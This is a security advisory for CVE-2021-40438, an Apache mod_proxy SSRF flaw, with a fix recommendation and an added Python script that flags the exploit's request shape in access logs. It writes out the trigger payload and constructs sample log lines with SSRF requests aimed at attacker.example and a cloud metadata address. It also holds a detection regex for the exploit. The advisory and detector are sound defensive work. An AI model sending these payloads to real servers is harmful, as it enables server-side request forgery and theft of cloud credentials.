PT-2021-1392 · Apache · Apache Http Server
The Apache
Published 2021-09-16 · Updated 2026-03-10
CVE-2021-40438
CVSS v3.1 9.0 Critical
| Vector | AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H |
Name of the Vulnerable Software and Affected Versions:
Apache HTTP Server versions 2.4.48 and earlier
Description:
A crafted request URI path can cause mod_proxy to forward the request to an origin server chosen by the remote user. The root cause is insufficient validation of the incoming request URI when mod_proxy works out which backend to connect to, so a remote, unauthenticated attacker can make the server issue requests to a host of the attacker's choosing (Server-Side Request Forgery, SSRF). Only deployments that actually route requests through mod_proxy (for example a ProxyPass reverse proxy) are exposed. The estimated number of potentially affected devices worldwide is not specified. Real-world exploitation of this issue has been reported.
Recommendations:
For Apache HTTP Server versions 2.4.48 and earlier, update to 2.4.49 or later, where this issue is fixed. As a temporary workaround, restrict mod_proxy: disable the module (and its mod_proxy_* submodules) where it is not needed, and where a reverse proxy is required, limit which paths are proxied and who can reach them. Avoid configurations in which an untrusted client can influence the target mod_proxy connects to, and review proxy and access logs for unexpected outbound connections until the update is applied.
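The following detection script is an added example for this advisory, not code from the advisory's publisher or from the Apache httpd project. The publicly known trigger for CVE-2021-40438 is a request URI (normally the query string) that embeds a `unix:` socket reference, an overlong socket path, and then `|` followed by the URL of the origin the attacker wants mod_proxy to contact, for example `GET /?unix:AAAA…AAAA|http://attacker.example/`. The script looks for that shape in the request field of combined-format access-log lines, URL-decoding first so `%7C`/`%3A` variants are not missed. The sample log lines are constructed, and the 4096-character threshold that separates a full-length attempt from a probe is an assumption based on the multi-kilobyte paths used by public proof-of-concept requests; shorter matches are still reported, as probes.

```python
"""Flag Apache access-log lines that carry the CVE-2021-40438 request shape.

Added example for the advisory above; not code from its publisher or from
the httpd project.  Trigger shape searched for in the request URI:
    unix:<overlong path>|<scheme>://<attacker-chosen origin>
The combined-log layout and the 4096-character threshold are assumptions
made for this illustration.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Combined log format: client ident user [time] "method uri proto" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]*)" (?P<status>\d{3})'
)

# "unix:" marker, a run of path characters, then "|" and a scheme://target.
# Case-insensitive because the marker is not required to be lower case.
TRIGGER_RE = re.compile(
    r'unix:(?P<path>[^|]*)\|(?P<target>[a-z][a-z0-9+.-]*://\S*)',
    re.IGNORECASE,
)

# Assumed threshold: public PoCs use socket paths of several thousand bytes.
EXPLOIT_PATH_LEN = 4096


def inspect_uri(uri: str) -> Optional[Dict[str, object]]:
    """Return match details if the URI carries unix:<path>|<url>, else None."""
    decoded = unquote(uri)  # catch %7C / %3A encodings of '|' and ':'
    m = TRIGGER_RE.search(decoded)
    if not m:
        return None
    path_len = len(m.group("path"))
    return {
        "target": m.group("target"),
        "path_len": path_len,
        "severity": "exploit" if path_len >= EXPLOIT_PATH_LEN else "probe",
    }


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Run inspect_uri over combined-format log lines and collect the hits."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        lm = LOG_RE.match(line)
        if not lm:
            continue  # not a combined-format line; skip rather than guess
        found = inspect_uri(lm.group("uri"))
        if found:
            found.update(client=lm.group("client"), time=lm.group("time"),
                         status=lm.group("status"))
            hits.append(found)
    return hits


# Constructed sample lines: a benign request, a short probe aimed at a cloud
# metadata address, and a full-length, URL-encoded attempt.
SAMPLE_LOG = [
    '198.51.100.7 - - [16/Sep/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "curl/7.74"',
    '198.51.100.8 - - [16/Sep/2021:10:00:02 +0000] "GET /?unix:' + "A" * 20 +
    '|http://169.254.169.254/latest/meta-data/ HTTP/1.1" 503 299 "-" "curl/7.74"',
    '198.51.100.9 - - [16/Sep/2021:10:00:03 +0000] "GET /?unix%3A' + "A" * 5000 +
    '%7Chttp://attacker.example/ HTTP/1.1" 200 1234 "-" "python-requests/2.26"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["client"]} {hit["severity"]:7} '
              f'path_len={hit["path_len"]} target={hit["target"]}')
```

A hit with severity `exploit` against a server still on 2.4.48 or earlier should be treated as a likely successful SSRF and the recorded `target` checked against what the proxy was allowed to reach; a `probe` hit is a scanner or an attacker sizing up the host and is worth correlating with the client address across other logs.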
Exploit · Fix · SSRF
Affected Products
Alt Linux
Almalinux
Apache Http Server
Astra Linux
Centos
Linuxmint
Red Hat
Rocky Linux
Suse
Ubuntu